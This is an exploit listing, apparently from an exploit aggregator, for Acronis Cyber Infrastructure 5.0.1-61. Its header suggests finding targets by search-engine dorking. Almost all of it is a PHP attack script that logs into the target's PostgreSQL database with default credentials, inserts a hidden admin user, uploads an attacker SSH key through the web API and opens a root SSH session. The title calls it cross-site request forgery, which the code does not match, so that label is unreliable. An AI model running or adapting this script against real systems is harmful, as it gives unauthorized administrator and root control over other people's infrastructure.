Exploit for Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery

Name: Exploit for Acronis Cyber Infrastructure 5.0.1-61 Cross Site Request Forgery
Rating: 5 (107 reviews)
2024-10-04 | CVSS 7.4
## https://sploitus.com/exploit?id=PACKETSTORM:182005
=============================================================================================================================================  
| # Title : Acronis Cyber Infrastructure 5.0.1-61 CSRF Add ADmin Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.acronis.com/en-eu/products/cyber-infrastructure/ |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] add new admin.  
  
[+] Line 83 + 100 +138 + 202 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
<?php  
  
class AcronisExploit {  
private $sshSocket;  
private $dbConn;  
private $clusterId;  
  
public function __construct() {  
// Initialize default values  
$this->sshSocket = null;  
$this->dbConn = null;  
$this->clusterId = null;  
}  
  
// Function to add an admin user to PostgreSQL DB  
public function addAdminUser($username, $userid, $password) {  
echo "Creating admin user $username with userid $userid\n";  
  
// Insert new admin user into the user table  
$resQuery = $this->postgresQuery("INSERT INTO \"user\" VALUES('$userid','{}','T',NULL,NULL,NULL,'default');");  
if (!$resQuery) return false;  
  
// Insert new admin user into the local_user table  
$resQuery = $this->postgresQuery("SELECT MAX(id) FROM \"local_user\";");  
if (!$resQuery) return false;  
  
$idLuser = pg_fetch_result($resQuery, 0, 0) + 1;  
$resQuery = $this->postgresQuery("INSERT INTO \"local_user\" VALUES('$idLuser','$userid','default','$username',NULL,NULL);");  
if (!$resQuery) return false;  
  
// Hash the password  
$passwordHash = password_hash($password, PASSWORD_BCRYPT);  
echo "Setting password $password with hash $passwordHash\n";  
$today = date('Y-m-d');  
$resQuery = $this->postgresQuery("INSERT INTO \"password\" VALUES('$idLuser','$idLuser',NULL,'F','$passwordHash',0,NULL,DATE '$today');");  
if (!$resQuery) return false;  
  
// Assign admin roles  
$idProjectRole = $this->postgresQuery("SELECT id FROM \"project\" WHERE name = 'admin' AND domain_id = 'default';");  
$idAdminRole = $this->postgresQuery("SELECT id FROM \"role\" WHERE name = 'admin';");  
echo "Assigning the admin roles: $idProjectRole and $idAdminRole\n";  
$this->postgresQuery("INSERT INTO \"assignment\" VALUES('UserProject','$userid','$idProjectRole','$idAdminRole','F');");  
  
echo "Successfully created admin user $username with password $password\n";  
return true;  
}  
  
// Function to run a PostgreSQL query  
private function postgresQuery($query) {  
$result = pg_query($this->dbConn, $query);  
if (!$result) {  
echo "PostgreSQL query failed: " . pg_last_error($this->dbConn) . "\n";  
return false;  
}  
return $result;  
}  
  
// Function to login to SSH  
public function doSshLogin($ip, $user, $sshKey) {  
$connection = ssh2_connect($ip, 22);  
if (!$connection) {  
echo "SSH connection failed\n";  
return false;  
}  
  
if (ssh2_auth_pubkey_file($connection, $user, $sshKey['public'], $sshKey['private'])) {  
$this->sshSocket = $connection;  
return true;  
} else {  
echo "SSH authentication failed\n";  
return false;  
}  
}  
  
// Function to login to Acronis Cyber Infrastructure web portal  
public function aciLogin($name, $pwd) {  
$postData = json_encode([  
'username' => $name,  
'password' => $pwd  
]);  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/login");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);  
curl_setopt($ch, CURLOPT_HTTPHEADER, [  
'Content-Type: application/json',  
'X-Requested-With: XMLHttpRequest'  
]);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$response = curl_exec($ch);  
curl_close($ch);  
  
return (strpos($response, '"code":200') !== false);  
}  
  
// Function to get the cluster ID  
public function getClusterId() {  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/clusters");  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$response = curl_exec($ch);  
curl_close($ch);  
  
$data = json_decode($response, true);  
if (isset($data['data'][0]['id'])) {  
return $data['data'][0]['id'];  
}  
  
return null;  
}  
  
// Function to generate SSH keys  
private function generateSshKeys() {  
$privateKey = tempnam(sys_get_temp_dir(), 'ssh_private');  
$publicKey = $privateKey . '.pub';  
ssh2_genkeypair($privateKey, $publicKey);  
return [  
'private' => $privateKey,  
'public' => $publicKey  
];  
}  
  
// Function to upload SSH public key  
public function uploadSshKey($sshKey, $clusterId) {  
$postData = json_encode([  
'key' => $sshKey,  
'event' => [  
'name' => 'SshKeys',  
'method' => 'post',  
'data' => [  
'key' => $sshKey  
]  
]  
]);  
  
$ch = curl_init();  
curl_setopt($ch, CURLOPT_URL, "https://target-uri/api/v2/$clusterId/ssh-keys");  
curl_setopt($ch, CURLOPT_POST, true);  
curl_setopt($ch, CURLOPT_POSTFIELDS, $postData);  
curl_setopt($ch, CURLOPT_HTTPHEADER, [  
'Content-Type: application/json',  
'X-Requested-With: XMLHttpRequest'  
]);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
$response = curl_exec($ch);  
curl_close($ch);  
  
return (strpos($response, '"task_id"') !== false);  
}  
  
// Main exploit function  
public function exploit($rhost, $dbPort, $sshPort, $username, $password) {  
// Connect to PostgreSQL  
$this->dbConn = pg_connect("host=$rhost port=$dbPort dbname=keystone user=vstoradmin password=vstoradmin");  
if (!$this->dbConn) {  
echo "Could not connect to PostgreSQL database\n";  
return false;  
}  
  
// Add a new admin user  
$newUsername = substr(md5(rand()), 0, 8);  
$newPassword = substr(md5(rand()), 0, 16);  
$userId = bin2hex(random_bytes(16));  
$this->addAdminUser($newUsername, $userId, $newPassword);  
  
// Login to Acronis  
if (!$this->aciLogin($newUsername, $newPassword)) {  
echo "Failed to login to Acronis\n";  
return false;  
}  
  
// Get cluster ID  
$this->clusterId = $this->getClusterId();  
if (!$this->clusterId) {  
echo "Failed to get cluster ID\n";  
return false;  
}  
  
// Generate SSH keys  
$sshKey = $this->generateSshKeys();  
  
// Upload SSH public key  
if (!$this->uploadSshKey($sshKey['public'], $this->clusterId)) {  
echo "Failed to upload SSH public key\n";  
return false;  
}  
  
// SSH Login  
if (!$this->doSshLogin($rhost, 'root', $sshKey)) {  
echo "SSH login failed\n";  
return false;  
}  
  
echo "Exploit successful, SSH session established!\n";  
return true;  
}  
}  
  
// Example usage  
$exploit = new AcronisExploit();  
$exploit->exploit('target-ip', 6432, 22, 'vstoradmin', 'vstoradmin');  
  
  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================